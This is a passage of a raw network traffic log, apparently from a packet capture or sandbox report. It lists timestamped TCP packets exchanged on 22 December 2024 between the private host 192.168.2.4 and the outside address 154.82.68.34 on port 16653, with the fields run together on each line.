                                      Dec 22, 2024 08:37:08.607762098 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.607785940 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.607810020 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.607820988 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.608932972 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.608982086 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.609045029 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.609092951 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.610136986 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.610178947 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.610326052 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.610368967 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.611323118 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.611368895 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.611438990 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.611483097 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.612464905 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.612509966 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.612581015 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.612622976 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.613653898 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.613701105 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.613769054 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.613811970 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.614840031 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.614886045 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.615186930 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.615236044 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.616008997 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.616054058 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.616117954 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.616168022 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.617177963 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.617223978 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.617289066 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.617336035 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.618431091 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.618474960 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.618541002 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.618587017 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.619581938 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.619627953 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.619874001 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.619918108 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.620820045 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.620866060 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.620913982 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.620954990 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.621952057 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.621997118 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.622045040 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.622083902 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.623117924 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.623164892 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.623272896 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.623318911 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.624294996 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.624337912 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.624382973 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.624423027 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.625444889 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.625492096 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.625582933 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.625624895 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.626811981 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.626857042 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.626879930 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.626923084 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.627873898 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.627924919 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.627952099 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.627993107 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.629024029 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.629067898 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.629129887 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.629175901 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.630191088 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.630239010 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.630422115 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.630474091 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.631597042 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.631643057 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.631683111 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.631721973 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.632560968 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.632612944 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.632662058 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.632700920 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.633779049 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.633827925 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.633902073 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.633949041 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.634970903 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.635015965 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.635103941 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.635149002 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.636318922 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.636369944 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.636533976 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.636588097 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.637356043 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.637398958 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.637449980 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.637490034 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.638526917 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.638544083 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.638573885 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.638583899 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.639647007 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.639697075 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.639746904 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.639794111 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.640877962 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.640932083 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.640942097 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.640980005 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.642020941 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.642070055 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.642097950 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.642138958 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.643225908 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.643270969 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.643306971 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.643352985 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.644364119 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.644412041 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.644443989 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.644480944 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.645543098 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.645591974 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.775933981 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.776000023 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.776068926 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.776110888 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.776343107 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.776386976 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.776431084 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.776477098 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.777260065 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.777309895 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.777391911 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.777434111 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.778476000 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.778532028 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.778651953 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.778702021 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.779642105 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.779689074 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.779727936 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.779773951 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.780844927 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.780886889 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.780966043 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.781009912 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.781985998 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.782026052 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.782093048 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.782135010 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.783154964 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.783198118 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.783236027 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.783277988 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.784348965 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.784390926 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.784463882 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.784504890 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.785614967 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.785656929 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.785701990 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.785741091 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.786798954 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.786840916 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.786885023 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.786926985 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.788342953 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.788388968 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.788535118 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.788574934 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.789489985 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.789530993 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.789623022 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.789664030 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.790730953 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.790757895 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.790775061 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.790793896 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.792038918 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.792081118 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.792139053 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.792179108 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.792970896 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.793018103 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.793092966 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.793132067 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.793812990 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.793859959 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.793904066 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.793951988 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.794944048 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.794989109 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.795047998 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.795089960 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.796214104 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.796261072 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.796273947 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.796313047 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.797422886 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.797472000 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.797516108 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.797558069 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.798506975 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.798552036 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.798604965 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.798650026 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.799702883 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.799747944 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.799853086 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.799896955 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.800873041 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.800919056 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.800971031 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.801009893 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.802045107 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.802088976 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.802176952 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.802223921 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.803222895 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.803271055 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.803364038 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.803406954 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.804441929 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.804486990 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.804613113 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.804656029 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.805658102 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.805704117 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.805733919 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.805778027 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.806808949 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.806854963 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.806888103 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.806934118 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.808001995 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.808051109 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.808079004 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.808126926 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.809154034 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.809197903 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.809263945 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.809314966 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.810354948 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.810400009 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.810492992 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.810538054 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.811537027 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.811583042 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.811646938 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.811687946 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.812720060 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.812762976 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.812808037 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.812849045 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.813855886 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.813900948 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.813970089 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.814013004 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.815253973 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.815296888 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.815474987 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.815517902 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.816363096 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.816406012 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.816431999 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.816477060 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.817485094 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.817528963 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.817591906 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.817635059 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.818583012 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.818629026 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.818665981 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.818707943 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.819808006 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.819852114 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.819955111 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.819996119 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.820974112 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.821018934 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.821207047 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.821249962 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.822144985 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.822189093 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.822227955 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.822269917 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.823295116 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.823339939 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.823388100 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.823430061 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.824546099 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.824593067 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.824626923 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.824667931 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.825680017 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.825745106 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.825782061 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.825824022 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.826838017 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.826883078 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.827059031 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.827100039 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.828243017 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.828286886 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.828345060 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.828385115 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.829243898 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.829288960 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.829333067 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.829371929 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.830385923 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.830431938 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.830504894 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.830550909 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.831573963 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.831615925 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.831684113 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.831728935 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.832746983 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.832791090 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.832859993 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.832904100 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.833936930 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.833992004 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.834036112 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.834074020 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.835119963 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.835160971 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.835205078 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.835258961 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:08.836441040 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:08.836492062 CET4973016653192.168.2.4154.82.68.34
